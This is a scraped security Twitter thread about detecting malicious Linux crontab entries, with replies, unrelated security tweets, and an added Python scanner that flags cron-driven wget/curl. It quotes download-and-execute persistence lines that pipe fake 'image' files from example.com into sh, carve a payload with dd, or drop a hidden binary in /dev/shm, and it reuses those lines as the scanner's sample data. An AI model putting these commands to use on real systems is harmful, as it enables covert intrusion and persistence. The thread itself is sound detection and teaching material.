Craig Rowland - Agentless Linux Security @CraigHRowland
Agentless Linux security and incident response. Linux malware, digital forensics, intrusion detection, and long nights. Founder @SandflySecurity. sandflysecurity.com Christchurch City, New Zealand. Joined October 2018.
This is also what I recommend: flag any scheduled task with curl or wget regardless of what it is doing. I'll tell you a story about why you shouldn't use wget/curl in scheduled tasks on Linux. This mistake helped me break into a network one time.
Let's discuss malicious crontab on Linux. What parts of these entries are suspicious?

wget -O - -q hxxp://www.example.com/pics/logo.jpg|sh
curl hxxp://www.example.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh
wget hxxp://www.example.com/x86_64 -O /dev/shm/.blah

There are many right answers here. Let's see how many people spot them. We'll discuss them in detail a little later.
The best .bat payload nowadays might just be a single curl command to drop a lnk into the startup folder 🥴
@CraigHRowland @lcamtuf IRC is evil. It led straight to facebook.
Recently came across this obfuscation tool being abused in the wild: github.com/DARKNOSY/Rush-… Detection ops: a YARA rule looking for Rush-PowerShell-Obfuscator. Large PS1 files: the obfuscation seems to produce PS1 files over 10 MB, which is rare in and of itself. #CTI…
fyi: ESX, PanOS, and many other devices have gdb installed by default. There are always sneakier ways to stage..
Did you guys know that Linux is so developer-oriented that it has a special folder called /dev/ where you are supposed to develop all your projects? It's true, check it on your distro!
As I’ve said before, I do not login to any of my Crown Jewel accounts (email, work, twitter, banking) on anything I don’t own and have complete confidence in. Because of stuff like this. Be very skeptical always. This is your entire electronic life we’re talking about.
A novel attack on Android TVs, where people might sign into their Google account in an Airbnb or an office. Usually they're locked down, but by downloading other software an attacker can access the entire contents of the Google account, email, drive, more 404media.co/android-tvs-ca…
another one 👩🔬 h/t @HackingLZ 🧊 blog.talosintelligence.com/arcanedoor-new…
testing in prod. 👩🔬
I don't use twitter too much these days (check my mastodon) but: first one: wget executing an "image" / wget flat out trying to pull an image file (how often would you really need to do that?). Second one: curl pulling an image, using dd on an image file, and executing an image.
Third one: saving a file to /dev/shm, having a binary starting with a literal . (making it hidden) and its execution, and if it were to execute, new process execution out of /dev/shm 😁 Lots of good detectors from one tweet!
@CraigHRowland The entire thing. It's not supposed to be in crontab but in a script that is referenced within crontab...
@CraigHRowland Piping jpg into sh? Why that? curl output pipe into dd and then sh - looks strange. Piping output from a download into /dev/shm may create funny results.
@SaltinDeadsec @CraigHRowland If the attacker can update the system crontab, then they have already elevated to root.
@CraigHRowland All of them. Why do you have a crontab that pulls a document from the internet? That alone is very suspicious. Most software would run a program or script to do an update check, not just a single wget. 1. Executes the file as a shell script. 2. Skips 2446 bytes then…
@CraigHRowland I honestly alert on every single instance of crond calling either wget or curl with http in the command line with a few IP+domain exclusions. Completely manageable volume to poke through even with a massive nix env. Fires maybe only once a month or so.
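As an added example for this page (not Sandfly's code and not anything posted in the thread), here is a small Python scanner that applies the rules the thread converges on to system-crontab lines: flag every cron-driven wget/curl outright, then attach evidence tags for download-to-interpreter pipes, `dd skip=` carving, "image" URLs being fetched, `-k`/`--insecure`, and output written to /dev/shm, /tmp or a dotfile. The sample crontab is constructed from the three entries quoted at the top of the page plus two benign-looking lines; the allow-listed host `repo.example.com` and the system-crontab layout (schedule, user, command) are assumptions for illustration.

```python
"""Flag suspicious wget/curl usage in cron entries.

Added example, not Sandfly's code. Assumes the system crontab format
(schedule fields, user, command) as in /etc/crontab and /etc/cron.d/*.
"""
import re
import shlex

INTERPRETERS = {"sh", "bash", "dash", "zsh", "ksh", "python", "python3", "perl"}
MEDIA_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp", ".ico", ".svg", ".webp")
VOLATILE_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/", "/run/")
URL_RE = re.compile(r"\b(?:https?|hxxps?|ftp)://[^\s|'\"]+", re.IGNORECASE)

# Constructed sample: the three entries from the thread (de-fanged hxxp kept)
# plus two lines that look like ordinary administration.
SAMPLE_CRONTAB = """\
*/5 * * * * root wget -O - -q hxxp://www.example.com/pics/logo.jpg|sh
0 * * * * root curl hxxp://www.example.com/0/beauty-036457.png -k|dd skip=2446 bs=1|sh
@reboot root wget hxxp://www.example.com/x86_64 -O /dev/shm/.blah
0 3 * * * root /usr/local/bin/backup.sh
30 2 * * * root curl -s https://repo.example.com/status.json -o /var/lib/app/status.json
"""


def command_of(line):
    """Return the command part of a system-crontab line; None for blank/comment/env lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
        return None
    n = 1 if line.startswith("@") else 5          # @reboot etc. vs. five time fields
    fields = line.split(None, n + 1)              # schedule fields, user, command
    return fields[n + 1] if len(fields) > n + 1 else None


def pipeline_segments(cmd):
    """Split a shell command on single '|' (not '||') into argv lists."""
    segs = []
    for seg in re.split(r"(?<!\|)\|(?!\|)", cmd):
        try:
            argv = shlex.split(seg)
        except ValueError:                        # unbalanced quotes: fall back to whitespace
            argv = seg.split()
        if argv:
            segs.append(argv)
    return segs


def output_path(argv):
    """Best-effort destination file for wget -O / curl -o / shell redirection in one segment."""
    tool = argv[0].rsplit("/", 1)[-1]
    for i, a in enumerate(argv):
        if a in (">", ">>") and i + 1 < len(argv):
            return argv[i + 1]
        if tool == "wget" and a in ("-O", "--output-document") and i + 1 < len(argv):
            return argv[i + 1]
        if tool == "wget" and a.startswith("--output-document="):
            return a.split("=", 1)[1]
        if tool == "curl" and a in ("-o", "--output") and i + 1 < len(argv):
            return argv[i + 1]
    return None


def analyze_command(cmd):
    """Return sorted reason tags for one cron command; [] means nothing worth a look."""
    tags = set()
    seen_download = False
    for argv in pipeline_segments(cmd):
        tool = argv[0].rsplit("/", 1)[-1]
        if tool in ("wget", "curl"):
            seen_download = True
            tags.add("downloader_in_cron")        # the blanket rule: cron + wget/curl, full stop
            for url in URL_RE.findall(" ".join(argv)):
                if url.split("?", 1)[0].lower().endswith(MEDIA_EXT):
                    tags.add("media_url_fetched")  # an "image" that is then run is not an image
            if tool == "curl" and ("-k" in argv or "--insecure" in argv):
                tags.add("tls_verification_disabled")
            dest = output_path(argv)
            if dest and dest != "-":
                if dest.startswith(VOLATILE_DIRS):
                    tags.add("written_to_volatile_dir")
                if dest.rsplit("/", 1)[-1].startswith("."):
                    tags.add("hidden_output_file")
        elif seen_download and tool == "dd" and any(a.startswith("skip=") for a in argv):
            tags.add("dd_carve_after_download")    # payload carved out of a decoy file by offset
        elif seen_download and tool in INTERPRETERS:
            tags.add("download_piped_to_interpreter")
    return sorted(tags)


def scan_crontab(text, allowed_hosts=()):
    """Return (line, tags) for every entry calling wget/curl, minus plain fetches from allowed hosts.

    Mirrors the approach in the replies: alert on every cron-driven wget/curl and keep a
    short host exclusion list; any tag beyond the blanket one is extra evidence for triage.
    """
    hits = []
    for line in text.splitlines():
        cmd = command_of(line)
        if cmd is None:
            continue
        tags = analyze_command(cmd)
        if not tags:
            continue
        hosts = {re.sub(r"^\w+://", "", u).split("/", 1)[0].lower() for u in URL_RE.findall(cmd)}
        if tags == ["downloader_in_cron"] and hosts and hosts <= set(allowed_hosts):
            continue                              # plain fetch from an approved host only
        hits.append((line.strip(), tags))
    return hits


if __name__ == "__main__":
    for line, tags in scan_crontab(SAMPLE_CRONTAB, allowed_hosts=("repo.example.com",)):
        print(f"{', '.join(tags)}\n    {line}")
```

Run against the constructed sample with `repo.example.com` allow-listed, the three entries from the thread are reported and the status-file fetch is not; with an empty allow-list every wget/curl line surfaces, which is the volume the replies describe as manageable once a handful of hosts are excluded. Combined short flags such as `-sk` are not decoded, so extend the flag checks before relying on the TLS tag.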
Sandfly 5.0 runs on Ubiquiti routers agentlessly with full compromise detection features, including our new drift detection to find any unexpected changes.
Russian hackers hijack Ubiquiti routers to launch stealthy attacks - @serghei bleepingcomputer.com/news/security/…
Our agentless drift detection can do file integrity monitoring on Linux, plus much more. Watch a demo where we find a PHP backdoor and malicious change to the Linux system binary directory. We can do this instantly without loading any endpoint agents. youtube.com/watch?v=yDdmLr…
We've summarized the SSH XZ backdoor attack with detection strategies for Linux in the article below. sandflysecurity.com/blog/xz-ssh-ba…